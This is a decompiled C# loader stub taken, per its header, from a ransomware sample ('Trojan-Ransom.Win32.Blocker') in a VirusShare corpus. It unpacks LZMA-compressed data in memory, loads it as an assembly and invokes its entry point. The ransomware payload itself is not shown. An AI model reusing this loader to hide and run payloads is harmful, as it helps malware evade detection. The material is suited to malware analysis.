// Decompiled with JetBrains decompiler // Type: // Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null // MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe using System; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Security; internal class \u003CModule\u003E { public static __FnPtr LzmaVirtualFree; public static __FnPtr LzmaVirtualAlloc; public static unsafe int main() { byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()]; rawAssembly.Initialize(); fixed (byte* numPtr = &rawAssembly[0]) { if (\u003CModule\u003E.GetoriginalData(numPtr) != 0) { Assembly assembly = Assembly.Load(rawAssembly); int count1 = assembly.EntryPoint.GetParameters().Count; object[] parameters = new object[count1]; if (count1 != 0) { string[] commandLineArgs = Environment.GetCommandLineArgs(); int count2 = Environment.GetCommandLineArgs().Count; string[] strArray = new string[count2 - 1]; int index = 1; if (1 < count2) { do { strArray[index - 1] = commandLineArgs[index]; ++index; } while (index < count2); } parameters[0] = (object) strArray; } // ISSUE: explicit non-virtual call __nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters)); } return 0; } } [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int RangeDecoderBitTreeDecode( [In] ushort* obj0, [In] int obj1, [In] _CRangeDecoder* obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int RangeDecoderReverseBitTreeDecode( [In] ushort* obj0, [In] int obj1, [In] _CRangeDecoder* obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe byte LzmaLiteralDecodeMatch( [In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] byte obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int LzmaDecode( [In] byte* obj0, [In] uint obj1, [In] int obj2, [In] int obj3, [In] int obj4, [In] byte* obj5, [In] uint obj6, [In] byte* obj7, [In] uint obj8); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int LzmaBlockUnPack( [In] byte* obj0, [In] byte* obj1, [In] __FnPtr obj2, [In] __FnPtr obj3); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern uint GetoriginalSize(); [SuppressUnmanagedCodeSecurity] [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)] public static extern unsafe int GetoriginalData([In] byte* obj0); }